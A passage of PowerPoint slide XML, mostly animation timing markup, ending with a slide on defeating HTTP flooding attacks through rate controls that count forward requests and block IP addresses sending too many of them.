                                    <p:animMotion origin="layout" path="M -4.6875E-6 -2.40741E-6 L -0.06269 0.14908 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="212" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="36257"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-3100" y="7500"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="213" presetID="0" presetClass="path" presetSubtype="0" repeatCount="4000" accel="50000" decel="50000" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -4.375E-6 -1.85185E-6 L -0.10761 0.0456 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="214" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="36296"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-5400" y="2300"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="215" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="216" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="534"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="217" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="534"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="218" presetID="1" presetClass="emph" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animClr clrSpc="rgb" dir="cw">
                                      <p:cBhvr>
                                        <p:cTn id="219" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="534"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fillcolor</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <a:srgbClr val="FF3300"/>
                                      </p:to>
                                    </p:animClr>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="220" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="534"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fill.type</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="solid"/>
                                      </p:to>
                                    </p:set>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="221" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="534"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fill.on</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="true"/>
                                      </p:to>
                                    </p:se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261"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="226" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="261"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="227" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="228" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="267"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="229" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="267"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="230" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="231" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="277"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="232" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="277"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="233" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="234" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="283"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="235" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="283"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="236" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="237" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="238" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="264"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="239" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="264"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="240" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="241" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="270"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="242" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="270"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="243" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="244" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="280"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="245" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="280"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="246" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="247" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="286"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="248" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="286"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                      </p:childTnLst>
                    </p:cTn>
                  </p:par>
                  <p:par>
                    <p:cTn id="249" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="250" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="251" presetID="0" presetClass="path" presetSubtype="0" repeatCount="4000" accel="50000" decel="50000" fill="hold" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -0.00084 0.00023 L -0.06529 0.15243 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="252" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="36257"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-3200" y="7600"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="253" presetID="0" presetClass="path" presetSubtype="0" repeatCount="4000" accel="50000" decel="50000" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -9.375E-7 -2.03704E-6 L -0.0804 0.24919 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="254" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="264"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-4000" y="12500"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="255" presetID="0" presetClass="path" presetSubtype="0" repeatCount="4000" accel="50000" decel="50000" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 4.58333E-6 2.22222E-6 L -0.16895 0.05949 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="256" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="270"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-8500" y="3000"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="257" presetID="0" presetClass="path" presetSubtype="0" repeatCount="4000" accel="50000" decel="50000" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -4.47917E-6 -2.22222E-6 L -0.13769 0.23762 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="258" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="280"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-6900" y="11900"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="259" presetID="0" presetClass="path" presetSubtype="0" repeatCount="4000" accel="50000" decel="50000" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 5.20833E-7 -4.25926E-6 L -0.13835 0.15799 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="260" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="258"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-6900" y="7900"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="261" presetID="0" presetClass="path" presetSubtype="0" repeatCount="4000" accel="50000" decel="50000" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.0002 -0.00092 L -0.10345 0.04445 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="262" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="36296"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-5200" y="2300"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="263" presetID="0" presetClass="path" presetSubtype="0" repeatCount="4000" accel="50000" decel="50000" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -0.0002 0.00023 L -0.09707 -0.29468 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="264" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="24"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-4800" y="-14700"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="265" presetID="0" presetClass="path" presetSubtype="0" repeatCount="4000" accel="50000" decel="50000" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 3.54167E-6 -2.96296E-6 L -0.02188 -0.25104 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="266" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="286"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-1100" y="-12600"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="267" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="268" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="269" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="320"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="270" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="320"/>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xit" presetSubtype="8" fill="hold" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="274" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="555"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="275" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="555"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="276" presetID="22" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="277" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="563"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(right)">
                                      <p:cBhvr>
                                        <p:cTn id="278" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="563"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="279" presetID="1" presetClass="exit" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="280" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="563"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="281" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="282" presetID="22" presetClass="entr" presetSubtype="2" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="283" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="334"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(right)">
                                      <p:cBhvr>
                                        <p:cTn id="284"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 grpId="0" animBg="1"/>
      <p:bldP spid="524" grpId="0" animBg="1"/>
      <p:bldP spid="524" grpId="1" animBg="1"/>
      <p:bldP spid="525" grpId="0" animBg="1"/>
      <p:bldP spid="525" grpId="1" animBg="1"/>
      <p:bldP spid="526" grpId="0" animBg="1"/>
      <p:bldP spid="526" grpId="1" animBg="1"/>
      <p:bldP spid="532" grpId="0" animBg="1"/>
      <p:bldP spid="490" grpId="0" animBg="1"/>
      <p:bldP spid="49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31" descr="gray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35" y="3823293"/>
            <a:ext cx="2480776" cy="20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6" descr="Akamai_Server"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print">
            <a:alphaModFix amt="50000"/>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4595599" y="2917019"/>
            <a:ext cx="8816968" cy="4247758"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="728664" y="319090"/>
            <a:ext cx="12161315" cy="624340"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Defeating HTTP flooding attacks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3100" dirty="0"/>
              <a:t>– Rate Controls</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731522" y="1219194"/>
            <a:ext cx="13166725" cy="1185340"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514254" indent="-514254">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Count the number of Forward Requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514254" indent="-514254">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Block any IP address with excessive forward requests</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Right Arrow 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="9488099" y="4209604"/>
            <a:ext cx="2669427" cy="199898"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">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32" name="TextBox 31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9682534" y="4388353"/>
            <a:ext cx="1745819"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Client Request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Right Arrow 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="1938443" y="4644676"/>
            <a:ext cx="2645907" cy="211656"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="006600"/>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35" name="TextBox 34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2439426" y="3762226"/>
            <a:ext cx="1775496"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Forward Request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Left Arrow 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="1867885" y="5514816"/>
